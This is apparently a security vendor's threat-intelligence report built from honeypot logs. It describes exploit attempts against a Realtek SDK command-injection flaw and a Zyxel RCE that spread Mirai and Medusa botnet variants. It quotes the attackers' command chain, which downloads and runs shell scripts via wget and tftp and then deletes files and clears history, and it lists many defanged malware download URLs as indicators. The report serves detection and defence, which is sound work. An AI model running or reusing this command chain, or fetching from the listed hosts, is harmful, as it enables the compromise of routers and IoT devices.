A good understanding of active threats is necessary to achieve a good security posture. The following report provides actual trends that emerge from the Internet Background Noise. The data are provided using two weeks of our Honeypots logs.
Exploit of Realtek SDK vulnerability to propagate Mirai botnet
A command injection vulnerability was discovered in 2021 affecting some versions of Realtek Jungle SDK and allowing an unauthenticated attacker to execute arbitrary commands on the affected system. This vulnerability is tracked as CVE-2021-35394 and has a CVSSv3 score of 9.8 (critical).
Realtek microchips are sold and included in various IoT products and routers from different manufacturers all over the world.
These past couple of weeks, a surge in exploit attempts of CVE-2021-35394 has been observed on our honeypots with the aim of propagating the Mirai botnet, a self-replicating and automated malware.
22 IP addresses conducted these exploit attempts, targeting servers located in Pacific Asia and in Europe (see IoCs below). 80% of these exploit attempts come from IP addresses registered in the US, 6% in the Emirates and 5% in Vietnam. Almost 80% of the requests came from AS211252 Delis LLC.
If the exploit is successful, the attacker uses the following request:
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget <URL>; chmod 777 *; sh <filename1>; tftp -g <IP address> -r <filename2>; chmod 777 *; sh <filename2>; rm -rf *.sh; history -c
This aims at:
- Attempting to go either to tmp, /var/run, /mnt, /root or /
- Downloading <filename1> form the dedicated URL and executing it from basic shell
- Downloading and executing <filename2>
- Cleaning the temporary file and the local history
The files in question are variants of Mirai.
Below are the URLs to retrieve the malware files contained in the web requests observed on our honeypots:
|URL contained in the web request||Additional information|
|http[:]//87.251.67[.]57/EkSgbins.sh http[:]//103.186.147[.]155/bins/mips http[:]//94.232.46[.]201/Sakura.sh http[:]//46.3.112[.]133:808/download.sh http://22.214.171.124/jack5tr.sh http[:]//170.64.182[.]9/bins/void.mpsl http[:]//45.154.3[.]16/mpsl http[:]//46.3.112[.]143/download.sh http[:]//46.3.112[.]162/download.sh http[:]//195.133.40[.]248/mpsl http[:]//111.92.242[.]146/mpsl||–|
|http[:]//107.189.13[.]143/download.sh http[:]//143.198.217[.]16/bins/mpsl http[:]//45.148.116[.]40/bins/mips http[:]//47.87.241[.]156/bins/kgf.mips http[:]//84.54.50[.]104/mips http[:]//79.137.198[.]58/hiddenbin/boatnet.mips http[:]//79.137.198[.]58/hiddenbin/boatnet.x86_64||These URL are known for downloading a Linux variant of Mirai.|
|http://43.139.138[.]38/mpsl http://109.206.240[.]148/bins/mp http[:]//64.93.80[.]146/mpsl http[:]//109.206.240[.]231/binS/botx.mpsl||Down at the time of writing|
These large-scale attacks are a concern for organizations, since IoT and routers are often looked over when it comes to cybersecurity. These detections align with the cybersecurity community’s recent observations of a global surge of attacks on Realtek products.
To prevent such attacks, it is important to apply vendor’s updates as soon as they are available. A security tool such as TEHTRIS NTA will help you detect any compromission of your devices.
IoCs – IP addresses
Exploit of RCE vulnerability in Zyxel product
A high-risk vulnerability, disclosed at the end of 2020, affects Zyxel products and allows a remote attacker to execute arbitrary code. The vulnerability is due to an inadequate handling of HTTP requests in the zhttpd webserver. Zyxel is a Taiwanese manufacturer of modems, network switches, routers and Wi-Fi access points, among other things.
Threat actors still rely on this exploit and scan the internet for vulnerable devices. Over the past couple of weeks, a unique web request coming from over 80 IP addresses has been observed:
The attacker aims at deleting what is in the tmp file and downloading then executing x.sh binary from URL http[:]//163.123.143[.]126/x.sh. The file is very likely SHA256 945196525c4b0a14709f68b2751811d3991265c22d5018b5941207414f95985d, seen for the first time in December 2022 and potentially associated with Linux Medusa botnet. Medusa botnet has been around for years, and a new variant has been spotted in the wild and is based on a Mirai botnet leaked source code.
1/4th of the exploit attempts came from IP addresses registered in China, and the other top countries of origin were India, Ukraine, Sweden and Australia.
To prevent a Zyxel device to be added to a botnet, you should update versions as soon as the vendor releases patches.
Exploit D-Link routers (with IoCs – IP addresses)
Information remain TEHTRIS sole property and reproduction is forbidden
TEHTRIS is and remains sole property rights owner of the information provided herein. Any copy, modification, derivative work, associated document, as well as every intellectual property right, is and must remain TEHTRIS’ sole and exclusive property. TEHTRIS authorizes the user to access for read use only. Except as expressly provided above, nothing contained herein will be construed as conferring any license or right under any TEHTRIS’ copyright.
No warranty and liability
TEHTRIS will not be held liable for any use, improper or incorrect use of the information described and/or contained herein and assume no responsibility for anyone’s use of the information. Although every effort has been made to provide complete and accurate information, TEHTRIS makes no warranty, expressed or implied regarding accuracy, adequacy, completeness, legality, reliability, or usefulness of any information provided herein. This disclaimer applies to both isolated and aggregated uses of the information.